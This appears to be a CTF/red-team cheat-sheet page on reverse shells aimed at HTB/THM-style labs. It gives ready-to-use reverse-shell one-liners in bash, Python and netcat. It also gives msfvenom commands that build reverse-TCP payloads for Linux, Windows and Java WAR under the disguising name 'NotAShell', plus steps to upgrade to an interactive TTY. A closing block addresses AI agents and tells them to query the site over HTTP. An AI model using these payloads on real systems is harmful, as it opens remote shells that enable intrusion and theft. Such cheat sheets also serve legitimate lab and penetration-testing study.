# Reverse Shell ## Caveats * **Port choice** * Use any open port from nmap scan. * For HTB/THM, you can assume port 443 works for reverse shell. * **Staged vs. non-staged payloads** * Try staged payloads first. * If it does not work, try non-staged payloads. ## PHP Reverse Shell Kali linux comes with this built-in PHP reverse shell: ``` /usr/share/webshells/php/php-reverse-shell.php ``` Change `$ip` and `$port` before using it: ![php-reverse-shell.php](https://3988450783-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWVjG_njKgBtvmnKaJh%2F-MXDqGokS7k4KBsWCXKg%2F-MXDqLCUgSFWfjF0b2HR%2Fimage.png?alt=media\&token=c5abecc9-3eb5-48f7-8546-6ee12b6a1fdb) For convenience, edit `~/.zshrc` (or `~/.bashrc`) and create an **alias** for copying this payload to current working directory: ```bash alias php-reverse-shell="cp /usr/share/webshells/php/php-reverse-shell.php ." ``` ## One-Liners ### Bash ```bash bash -i >& /dev/tcp//443 0>&1 ``` ### Python ```bash python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' ``` ### Netcat ```shell nc -e /bin/sh 443 ``` ```shell rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 443 >/tmp/f ``` ## Msfvenom ### Linux ```bash msfvenom -p linux/x64/shell/reverse_tcp LHOST=$IP LPORT=443 -f elf > NotAShell.elf ``` ### Windows ```bash msfvenom -p windows/x64/shell/reverse_tcp LHOST=$IP LPORT=443 -f exe > NotAShell.exe ``` ### WAR ```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST=$IP LPORT=443 -f war > NotAShell.war ``` ## Fully Interactive TTY Shell **Step 1 is sufficient in most scenarios.** If you plan to use things like **Vim** for privesc, then you need to complete all steps. ### Step 1: upgrade to TTY shell In the **remote** shell, upgrade the shell to TTY: ```bash python3 -c 'import pty; pty.spawn("/bin/bash")' ``` ### Step 2: export terminal environmental variables In your **local** shell, check the environmental variable `$TERM`: ```bash $ echo $TERM xterm-256color ``` In the **remote** shell, export the environmental variables `$TERM` and `$SHELL`: ```bash export TERM=xterm-256color export SHELL=/bin/bash ``` ### Step 3: set up terminal size In your **local** shell, check terminal **rows** and **columns**: ```bash $ stty size 36 145 ``` In the **remote** shell, press **ctrl+z** to bring the current session to **background**: ```bash ^Z [1]+ Stopped nc -nlvp 443 ``` Now you are brought back to the **local** shell. Bring the reverse shell to **foreground**: ```bash $ stty raw -echo;fg nc -nlvp 443 $ reset ``` Adjust the **terminal size**: ```bash $ stty rows 36 columns 145 ``` ## Reference {% embed url="" %} reverse shell cheat sheet - pentestmonkey.net {% endembed %} {% embed url="" %} Creating Metasploit Payloads {% endembed %} {% embed url="" %} Upgrade shell to full interactive TTY shell {% endembed %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ret2basic.gitbook.io/ctfnote/red-teaming/exploitation/reverse-shell.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.